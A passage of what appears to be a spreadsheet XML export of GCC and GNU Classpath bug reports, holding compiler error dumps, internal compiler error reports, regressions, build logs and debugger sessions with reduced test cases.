		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:470:                 Pl::String::Base_String::Owns_t::Owns_t(Pl::String::Base_String::Temp_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:466:                 Pl::String::Base_String::Owns_t::Owns_t(const Pl::String::Base_String::Shares_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:462:                 Pl::String::Base_String::Owns_t::Owns_t(const Pl::String::Base_String::Owns_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:459:                 Pl::String::Base_String::Owns_t::Owns_t() [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:172: no matching function for call to `Pl::String::Base_String std::allocator &gt;::Owns_t::Owns_t(Pl::String::Base_String std::allocator &gt;::Temp_t)'
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:475: candidates are: Pl::String::Base_String::Owns_t::Owns_t(const _Char_t*) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:470:                 Pl::String::Base_String::Owns_t::Owns_t(Pl::String::Base_String::Temp_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:466:                 Pl::String::Base_String::Owns_t::Owns_t(const Pl::String::Base_String::Shares_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:462:                 Pl::String::Base_String::Owns_t::Owns_t(const Pl::String::Base_String::Owns_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:459:                 Pl::String::Base_String::Owns_t::Owns_t() [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:176: no matching function for call to `Pl::String::Base_String std::allocator &gt;::Shares_t::Shares_t(Pl::String::Base_String std::allocator &gt;::Temp_t)'
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:597: candidates are: Pl::String::Base_String::Shares_t::Shares_t(Pl::String::Base_String::Temp_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:594:                 Pl::String::Base_String::Shares_t::Shares_t(Pl::String::Base_String::Shares_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:591:                 Pl::String::Base_String::Shares_t::Shares_t(Pl::String::Base_String::Owns_t&amp;) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:586:                 Pl::String::Base_String::Shares_t::Shares_t() [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh: In function `Pl::String::Base_String std::allocator &gt;::Temp_t Pl::String::operator+(const char* const Pl::String::Base_String std::allocator &gt;::Owns_t&amp;)':
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:168:   instantiated from here
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:445: `Pl::String::Base_String std::allocator &gt;::Descriptor_t*Pl::String::Base_String std::allocator &gt;::Raw_t::Desc' is protected
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:565: within this context
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:445: `Pl::String::Base_String std::allocator &gt;::Descriptor_t*Pl::String::Base_String std::allocator &gt;::Raw_t::Desc' is protected
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:566: within this context
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:445: `Pl::String::Base_String std::allocator &gt;::Descriptor_t*Pl::String::Base_String std::allocator &gt;::Raw_t::Desc' is protected
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:567: within this context
See attachments for foo.cc
</t>
  </si>
  <si>
    <t>geb</t>
  </si>
  <si>
    <t>GCC-23113</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] The -Wunused (value computed is not used) option missed an important case</t>
  </si>
  <si>
    <t>The following program compiled with gcc -Wunused issues no warnings
  int foo (void)
  void
  bar (int *p)
  {
     *p++  /* perhaps (*p)++ was intended? */
     foo () + foo ()
     foo () + foo () foo ()
  }
(gcc 2.9.6 issues warnings for all three lines)
I have found *p++ to be a fairly common error.
When sizeof(*p) == 1 or (*p)++ is illegal this is usually a superfluous `*'
but otherwise it is quite often a real bug and so there should be a warning.
I don't care much about things like 3+foo() but mention them
because of this inoperative comment in c-typeck.c
  /* With -Wunused we should also warn if the left-hand operand does have
     side-effects but computes a value which is not used.  For example in
     `foo() + bar() baz()' the result of the `+' operator is not used
     so we should issue a warning.  */
It looks like this code in stmt.c needs yet more tweaking:
    maybe_warn:
      /* If this is an expression with side effects don't warn.  */
      if (TREE_SIDE_EFFECTS (exp))
        return 0</t>
  </si>
  <si>
    <t>GCC-482</t>
  </si>
  <si>
    <t>[alpha Linux] exit(1) function causes compiler error with optimization</t>
  </si>
  <si>
    <t>I have here a module that contains one seemingly simple
function. When compiled with any optimization the exit(1)
line creates an internal error. If this line is commented
the error goes away. If optimization is turned off it also
goes away.
Release:
2.95.2
Environment:
alphaev56-unknown-linux-gnu
How-To-Repeat:
compile with
g++ -O(any level) -c -o errors.o errors.cpp</t>
  </si>
  <si>
    <t>humbird</t>
  </si>
  <si>
    <t>GCC-62020</t>
  </si>
  <si>
    <t>[5 regression] ICE in add_symbol_to_partition</t>
  </si>
  <si>
    <t>Between 20140725 (r213049) and 20140801 (r213453) occured a testsuite regression
on Solaris (both sparc and x86 32 and 64-bit):
FAIL: g++.dg/lto/20100302 cp_lto_20100302_0.o-cp_lto_20100302_1.o link -flto -fabi-version=2 (internal compiler error)
UNRESOLVED: g++.dg/lto/20100302 cp_lto_20100302_0.o-cp_lto_20100302_1.o execute -flto -fabi-version=2
The failure boils down to
./lto1 -quiet -fwpa cp_lto_20100302_0.o cp_lto_20100302_1.o
lto1: internal compiler error: in add_symbol_to_partition at lto/lto-partition.c:232
0x8295962 add_symbol_to_partition
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto-partition.c:232
0x8295582 add_references_to_partition
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto-partition.c:94
0x82956ce add_symbol_to_partition_1
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto-partition.c:168
0x8295de6 lto_balanced_map(int)
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto-partition.c:501
0x82901d2 do_whole_program_analysis
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto.c:3272
0x82901d2 lto_main()
        /vol/gcc/src/hg/trunk/local/gcc/lto/lto.c:3426
gdb finds
#1  0x08295963 in add_symbol_to_partition (part=part@entry=0x9433aa0 
    node=0xface4040) at /vol/gcc/src/hg/trunk/local/gcc/lto/lto-partition.c:232
232       gcc_assert (node-&gt;get_partitioning_class () == SYMBOL_DUPLICATE
(gdb) p node-&gt;get_partitioning_class()
$1 = SYMBOL_PARTITION
I can attach the .o files if this helps.
  Rainer</t>
  </si>
  <si>
    <t>GCC-3922</t>
  </si>
  <si>
    <t>[sparc-elf] embedded target makes UNIX calls</t>
  </si>
  <si>
    <t>Embedded targets should not have to provide sysconf()
getpagesize() or mprotect().  This appears to be responsible
for 40 test failures.
Targetting sparc-elf some tests fail to link like this:
spawn /usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/ /usr3/ftp_archive/gnu/gcc/ss/b3/gcc-30-cvs/gcc/testsuite/gcc.c-torture/execute/20000822-1.c testglue.o -w -O0 -I/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/sparc-elf//newlib/targ-include -I/usr3/ftp_archive/gnu/gcc/ss/b3/gcc-30-cvs/newlib/libc/include -nostdlib -nostartfiles -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/sparc-elf//libgloss/sparc/ -L/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/sparc-elf//libgloss/sparc -L/usr3/ftp_archive/gnu/gcc/ss/b3/gcc-30-cvs/libgloss/sparc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/sparc-elf//newlib/ -L/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/sparc-elf//newlib -Wl-wrapexit -Wl-wrapmain -Wl-wrapabort -lm -Telfsim.ld -o /usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/testsuite/20000822-1.x0 ^M
/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/libgcc.a(_trampoline.o): In function `check_enabling':^M
/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/../../gcc-30-cvs/gcc/libgcc2.c(.text+0x4): undefined reference to `sysconf'^M
/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/libgcc.a(_trampoline.o): In function `__enable_execute_stack':^M
/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/../../gcc-30-cvs/gcc/libgcc2.c(.text+0x40): undefined reference to `getpagesize'^M
/usr3/ftp_archive/gnu/gcc/ss/b3/b-sparc-elf/gcc/../../gcc-30-cvs/gcc/libgcc2.c(.text+0x64): undefined reference to `mprotect'^M
collect2: ld returned 1 exit status^M
compiler exited with status 1
Release:
gcc-30-cvs checked out on 20010802
Environment:
GNU/Linux RedHat 6.2
How-To-Repeat:
try to compile at least the test indicated above.</t>
  </si>
  <si>
    <t>CLASSPATH-22827</t>
  </si>
  <si>
    <t>jamvm/kaffe crash with unknown locale</t>
  </si>
  <si>
    <t xml:space="preserve">
When there is LANG value which is not locale-gen'ed
both kaffe and jamvm crash.  I'm not sure whose bug it is.
If its VM bug I can report it further.
public class Test3 {
public static void main(String [] args) {}}
$ LANG=vi kaffe-cvs Test3
Internal error: caught an unexpected exception.
Please check your CLASSPATH and your installation.
java/lang/NullPointerException
        at gnu.classpath.VMSystemProperties.getLocale(VMSystemProperties.java:native)
        at gnu.classpath.VMSystemProperties.preInit(VMSystemProperties.java:172)
        at gnu.classpath.SystemProperties.(SystemProperties.java:68)
        at java.lang.System.(System.java:43)
        at java.security.SecureClassLoader.(SecureClassLoader.java:61)
        at java.net.URLClassLoader.(URLClassLoader.java:548)
        at kaffe.lang.AppClassLoader.(AppClassLoader.java:237)
        at kaffe.lang.AppClassLoader.(AppClassLoader.java:35)
        at java.lang.VMClassLoader.getSystemClassLoader(VMClassLoader.java:293)
        at java.lang.ClassLoader$StaticData.(ClassLoader.java:160)
        at java.lang.ClassLoader.getSystemClassLoader(ClassLoader.java:772)
Aborted (core dumped)
# jamvm-cvs is jamvm 1.2.3 with Classpath from CVS
$ LANG=vi jamvm-cvs Test3
Segmentation fault (core dumped)
$
</t>
  </si>
  <si>
    <t>GCC-70093</t>
  </si>
  <si>
    <t>Instancing function with VM return type cases internal compiler error in 'assign_stack_temp_for_type'.</t>
  </si>
  <si>
    <t>Consider this example:
int main(int argc char **argv)
{
	struct {int _[argc]} fn() { }
	fn() //comment to trigger error on the next line
	__typeof__(fn()) *p
}
At the time local function 'fn' is instanced (either explicitly or using '__typeof__') the following error is displayed:
internal compiler error: in assign_stack_temp_for_type at function.c:793</t>
  </si>
  <si>
    <t>sasho648</t>
  </si>
  <si>
    <t>GCC-38074</t>
  </si>
  <si>
    <t>[4.4 Regression] missed inlining on Core2 Duo due  to apparent wrong branch prediction/profile</t>
  </si>
  <si>
    <t>With gfortran 4.3.2 the functions ddx and ddy in the channel.90 polyhedron test with:
gfortran -S -m64 -O3 -ffast-math -finline-limit=312 channel.f90
but not for -finline-limit=311.
Since the IRA merge this is no longer the case even if I use -finline-limit=6000. This causes a ~5% increase in the execution time (~2.4s compared to ~2.3s small but noticeable).
I suspect the same is true for the fatigue.f90 test.</t>
  </si>
  <si>
    <t>CLASSPATH-22734</t>
  </si>
  <si>
    <t>classpath0.08: java.lang.Runtime.loadLibrary : causes UnsatisfiedLinkException when VM is intializing</t>
  </si>
  <si>
    <t>Hi
While dealing with JAMVM I came across an exceptions related problem with java.lang.Runtime.loadLibrary.
Issue is that when scanning java.library.path dirs to find the required lib loadLibrary uses load. In its turn load raise exeception if lib is not find.
In case of JAMVM when this exeception hapens during intialization it aborts VM. Because of that LD_LIBRARY_PATH is not scanned completely and lib is not located at all.
This also could be attributed to JAMVM specifics and probably it is true. Yet I can understand also that VM exception handling may not be that accurate during VM build-up therefore I'd see it as Classpath issue as well.
Attached is a patch against Runtime.java which overcomes the problem by doing exactly what load does but without mentioned exception problem.
See sf.net/projects/jamvm:Forums-Help where this issues has been raised too.
-- niki</t>
  </si>
  <si>
    <t>GCC-82764</t>
  </si>
  <si>
    <t>[7/8 Regression] ICE in output_constructor_regular_field at varasm.c:5030</t>
  </si>
  <si>
    <t>Created attachment 42495
Reduced repro
Seemingly valid code (reduced from much more complex construct) causes ICE in armhf compiler (works fine on x64)
arm-linux-gnueabihf-gcc-7 --version
arm-linux-gnueabihf-gcc-7 (Ubuntu/Linaro 7.2.0-6ubuntu1) 7.2.0
arm-linux-gnueabihf-gcc-7 -std=c++17 -Wall -Wextra -c /tmp/test.cc
/tmp/test.cc: In function â€˜void test()â€™:
/tmp/test.cc:18:1: internal compiler error: in output_constructor_regular_field at varasm.c:5030
 }
Minimal repro:
struct Empty {}
struct Empty2 : Empty {}
struct A : Empty2
{
  int x {1}
  int y {2}
}
struct B
{
  A a {}
}
void test()
{
  B b
}
Removing -std=c++17 from parameters adding members to Empty or Empty2 removing braced initializers in A or B deriving A from Empty adding std::string member to A eliminates the ICE.
Repro on:
arm-linux-gnueabi-gcc-7 (Ubuntu/Linaro 7.2.0-6ubuntu1) 7.2.0
arm-linux-gnueabihf-gcc-7 (Ubuntu/Linaro 7.2.0-6ubuntu1) 7.2.0
alpha-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
mips64-linux-gnuabi64-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
mips64el-linux-gnuabi64-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
powerpc-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
powerpc-linux-gnuspe-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
No repro on:
arm-linux-gnueabihf-gcc-6 (Ubuntu/Linaro 6.4.0-3ubuntu1) 6.4.0 20170805
hppa-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
aarch64-linux-gnu-g++-7 (Ubuntu/Linaro 7.2.0-6ubuntu1) 7.2.0
m68k-linux-gnu-g++-7 (Ubuntu/Linaro 7.2.0-6ubuntu1) 7.2.0
mips-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
mipsel-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
powerpc64-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
powerpc64le-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
s390x-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
sh4-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
sparc64-linux-gnu-g++-7 (Ubuntu 7.2.0-6ubuntu1) 7.2.0
Hope this helps!</t>
  </si>
  <si>
    <t>apushkin</t>
  </si>
  <si>
    <t>GCC-16326</t>
  </si>
  <si>
    <t>[4.0 Regression] Bootstrap failure after RTL prologue/epilogue for SPARC patch</t>
  </si>
  <si>
    <t>IRIX6.5 bootstrap of mainline broke shortly after 2004-06-30 10:30 UTC.
The patch that prompted the change in behaviour is
http://gcc.gnu.org/ml/gcc-patches/2004-06/msg01049.html
2004-06-30  Eric Botcazou  
        RTL prologue/epilogue for SPARC
        [...]
The compiler dumps core during stage2_build with
./xgcc -B./ -B/disk4/billingd/tmp/gcc/mips-sgi-irix6.5/bin/ -
isystem /disk4/billingd/tmp/gcc/mips-sgi-irix6.5/include -
isystem /disk4/billingd/tmp/gcc/mips-sgi-irix6.5/sys-include -
L/disk4/billingd/obj/gcc/gcc/../ld -O2  -DIN_GCC    -W -Wall -Wwrite-strings -
Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -
isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -
I/disk4/billingd/src/gcc/gcc -I/disk4/billingd/src/gcc/gcc/. -
I/disk4/billingd/src/gcc/gcc/../include -
I/disk4/billingd/src/gcc/gcc/../libcpp/include -
I/disk4/billingd/src/gcc/gcc/../libbanshee/libcompat -
I/disk4/billingd/src/gcc/gcc/../libbanshee -
I/disk4/billingd/src/gcc/gcc/../libbanshee/points-to -I/usr/local/include -
DL_muldi3 -c /disk4/billingd/src/gcc/gcc/libgcc2.c -o libgcc/./_muldi3.o
/disk4/billingd/src/gcc/gcc/libgcc2.c: In function `__muldi3':
/disk4/billingd/src/gcc/gcc/libgcc2.c:459: internal compiler error: Abort
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-78067</t>
  </si>
  <si>
    <t>libgcc2 calls count_leading_zero with 0</t>
  </si>
  <si>
    <t>in libgcc2.c __floatdidf line 1637 I see:
  /* If there are no high bits set fall back to one conversion.  */
  if ((Wtype)u == u)
    return (FSTYPE)(Wtype)u
  /* Otherwise find the power of two.  */
  Wtype hi = u &gt;&gt; W_TYPE_SIZE
  if (hi &lt; 0)
    hi = -(UWtype) hi
  UWtype count shift
  count_leading_zeros (count hi)
If u is 1 &lt;&lt; W_TYPE_SIZE - 1
hi will be 0
and count_leading_zeros will be called with 0.
In that case see longling.h:
   5) count_leading_zeros(count x) counts the number of zero-bits from the
   msb to the first nonzero bit in the UWtype X.  This is the number of
   steps X needs to be shifted left to set the msb.  Undefined for X == 0
   unless the symbol COUNT_LEADING_ZEROS_0 is defined to some value.
we should check that COUNT_LEADING_ZEROS_0 is defined and identical
to W_TYPE_SIZE.
like this:
  UWtype count shift
#if defined (COUNT_LEADING_ZEROS_0) &amp;&amp; COUNT_LEADING_ZEROS_0 == W_TYPE_SIZE
  if (hi == 0)
    count = W_TYPE_SIZE
  else
#endif
  count_leading_zeros (count hi)</t>
  </si>
  <si>
    <t>GCC-42728</t>
  </si>
  <si>
    <t>-fcompare-debug failure (length) at -O1</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -fgraphite-identity -fcompare-debug -c testcase.c
Tested revisions:
r155833 - crash
r155363 - crash
r154886 - crash
r153685 - crash
Output:
$ /mnt/svn/gcc-trunk/binary-155833-lto/bin/gcc -O1 -fgraphite-identity -fcompare-debug -c testcase.c
gcc: testcase.c: -fcompare-debug failure (length)
Valgrind:
no errors reported</t>
  </si>
  <si>
    <t>CLASSPATH-46773</t>
  </si>
  <si>
    <t>[METABUG] Calling Policy.setPolicy with a new Policy object has no effect on the DefaultSecurityManager</t>
  </si>
  <si>
    <t>As shown by running this new Mauve test:
http://sources.redhat.com/cgi-bin/cvsweb.cgi/mauve/gnu/testlet/java/security/Policy/setPolicy.java?rev=1.1&amp;content-type=text/x-cvsweb-markup&amp;cvsroot=mauve
calling setPolicy has no effect on the default SecurityManager implementation provided by GNU Classapath.
This is because VMAccessController creates ProtectionDomain objects using the two argument constructor which uses static permissions.  The four argument constructor should be used instead so the policy is consulted.
Fixing this requires changes in a VM class which seems to have local copies in most Classpath VMs (at least CACAO gij and jamvm).  This metabug thus tracks fixing the issue separately in both gcj and Classpath's reference copy.</t>
  </si>
  <si>
    <t>GCC-10362</t>
  </si>
  <si>
    <t>Optimization with constant shifts and compares fails on MIPS</t>
  </si>
  <si>
    <t xml:space="preserve">From: Berger David-MGI2063 
To: 'gcc-gnats@gcc.gnu.org' 
Cc:  
Subject: RE: optimization/10362: Optimization with constant shifts and com
	pares fails on MIPS and x86 - probably all
Date: Wed 9 Apr 2003 12:19:25 -0700 
 I'd like to admend this bug report: it does the same thing on the x86 as well which indicates it is a front-end bug.  David.
 -----Original Message-----
 From: gcc-gnats@gcc.gnu.org [mailto:gcc-gnats@gcc.gnu.org] 
 Sent: Wednesday April 09 2003 11:46 AM
 To: David Berger
 Subject: Re: optimization/10362: Optimization with constant shifts and compares fails on MIPS
 Thank you very much for your problem report.
 It has the internal identification `optimization/10362'.
 The individual assigned to look at your
 report is: unassigned. 
 &gt;Category:       optimization
 &gt;Responsible:    unassigned
 &gt;Synopsis:       Optimization with constant shifts and compares fails on MIPS
 &gt;Arrival-Date:   Wed Apr 09 18:46:00 UTC 2003
</t>
  </si>
  <si>
    <t>dberger</t>
  </si>
  <si>
    <t>GCC-44466</t>
  </si>
  <si>
    <t>Segmentation fault in compilation</t>
  </si>
  <si>
    <t>When doing (node_refine.i attached):
gcc -DNDEBUG -O3 -I. -c node_refine.i
I get:
node_refine.c: In function â€˜KWayNodeRefine__â€™:
node_refine.c:162:6: internal compiler error: ViolaciÃ³ de segment
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>msteghofer</t>
  </si>
  <si>
    <t>GCC-12220</t>
  </si>
  <si>
    <t>[tree-ssa] bootstrap error with gmakecc on mips-sgi-IRIX6.5</t>
  </si>
  <si>
    <t>../gcc/configure --prefix=/usr/gFORTRAN --with-gmp=/usr/GMP --enable-
languages=cf95
gmake CC=cc -save-temps bootstrap
===================================
octane % cc -version
MIPSpro Compilers: Version 7.4
===================================
gmake[1]: Entering directory `/usr/people/wstan/objdir/libbanshee'
gmake AR_FLAGS=rc CC_FOR_BUILD=cc -save-temps CFLAGS=-g -O2 CXXFLAGS=-
g -O2 
CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET=-O2 -g -O2 INSTALL=../gcc/install-sh -
c 
INSTALL_DATA=../gcc/install-sh -c -m 644 INSTALL_PROGRAM=../gcc/install-sh -
c 
INSTALL_SCRIPT=../gcc/install-sh -c LDFLAGS= LIBCFLAGS=-g -O2 
LIBCFLAGS_FOR_TARGET=-O2 -g -O2 MAKE=gmake 
MAKEINFO=/usr/people/wstan/gcc/missing makeinfo --split-
size=5000000  PICFLAG= 
PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT=expect RUNTEST=runtest 
RUNTESTFLAGS= exec_prefix=/usr/gFORTRAN infodir=/usr/gFORTRAN/info 
libdir=/usr/gFORTRAN/lib prefix=/usr/gFORTRAN 
tooldir=/usr/gFORTRAN/mips-sgi-irix6.5 AR=ar AS=as CC=cc -save-temps 
CXX=c++ LD=/usr/bin/ld LIBCFLAGS=-g -O2 NM=nm PICFLAG= RANLIB=: 
DESTDIR= all-recursive
gmake[2]: Entering directory `/usr/people/wstan/objdir/libbanshee'
Making all in engine
gmake[3]: Entering directory `/usr/people/wstan/objdir/libbanshee/engine'
cc -save-temps -DHAVE_CONFIG_H -I. -I../../../gcc/libbanshee/engine -I..    
-I../../../gcc/libbanshee/engine/../libcompat 
-I../../../gcc/libbanshee/engine/../include -I. -Ddeletes= -Dtraditional= 
-Dsameregion= -Dparentptr= -fno-strict-aliasing -g -O2 -c 
../../../gcc/libbanshee/engine/array.c
Warning: Malformed file option (-fn) in -fno-strict-aliasing
cc-3569 cc: ERROR
  invalid macro definition:
cc-1040 cc: ERROR
  An identifier is expected.
cc-1005 cc: ERROR
  The source file .deps/array.pp is unavailable.
1 error and 2 catastrophic errors detected in the compilation 
of .deps/array.pp.
Compilation terminated.
gmake[3]: *** [array.o] Error 2
gmake[3]: Leaving directory `/usr/people/wstan/objdir/libbanshee/engine'
gmake[2]: *** [all-recursive] Error 1
gmake[2]: Leaving directory `/usr/people/wstan/objdir/libbanshee'
gmake[1]: *** [all-recursive-am] Error 2
gmake[1]: Leaving directory `/usr/people/wstan/objdir/libbanshee'
gmake: *** [all-libbanshee] Error 2</t>
  </si>
  <si>
    <t>GCC-1819</t>
  </si>
  <si>
    <t>severe problems debugging c++-code (libstdc++)</t>
  </si>
  <si>
    <t xml:space="preserve">Running the following program tp generates a segmentation
fault. If I set a breakpoint at the line std::cout &lt;&lt;   of the
program tp and set into that function the debugger messages are
unusable. First the line number is out of bounce the debugger
searche for a line with the number 635 instead of the correct line
number 213. Secondly the type of __cout basic_ostream&lt;_CharT
_Traits&gt;&amp; is not detected. After single stepping until somehow the
function   _S_pad_char is called I encounter that the debugger jumps
up and down inside the body of the function as if the were a loop
but there is not. I tryed different versions of the gdb. All showed
the same behaviour.
Release:
2.97 20010129 (experimental)
Environment:
System: Linux kiste 2.4.0 #25 Tue Jan 16 01:22:25 CET 2001 i686 unknown
Architecture: i686
glibc 2.1.3
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-nls --enable-shared
How-To-Repeat:
source code tp.C
#include
int main()
{
    std::cout.width(28)
    std::cout &lt;&lt;  
}
Running the program tp
peter@kiste:~ &gt; ./tp
Segmentation fault (core dumped)
debugging tp
GNU gdb 20010114
Copyright 2000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686-pc-linux-gnu...
(gdb) set demangle gnu-v3
Breakpoint 1 at 0x80486a8: file tp.C line 6.
(gdb) r
Breakpoint 1 main () at tp.C:6
(gdb) s
std::basic_ostream &gt;&amp; std::operator &gt;(std::basic_ostream &gt;&amp; char const*) (
    __out= __s=0x8048800  )
    at ../../../../gcc/libstdc++-v3/include/bits/std_ostream.h:635
Line number 635 out of range ../../../../gcc/libstdc++-v3/include/bits/std_ostream.h has 288 lines.
(gdb) 
Compiling the program tp
g++ -v -o tp tp.C -W -Wall -g -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with: ../gcc/configure --disable-nls --enable-shared --enable-threads=posix
gcc version 2.97 20010129 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=2 -D__GXX_ABI_VERSION=100 -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tp.C tp.ii
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/i686-pc-linux-gnu/include/g++-v3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -fpreprocessed tp.ii -quiet -dumpbase tp.C -g -W -Wall -version -o tp.s
GNU CPP version 2.97 20010129 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 2.97 20010129 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 2.97 20010129 (experimental).
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o tp.o tp.s
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
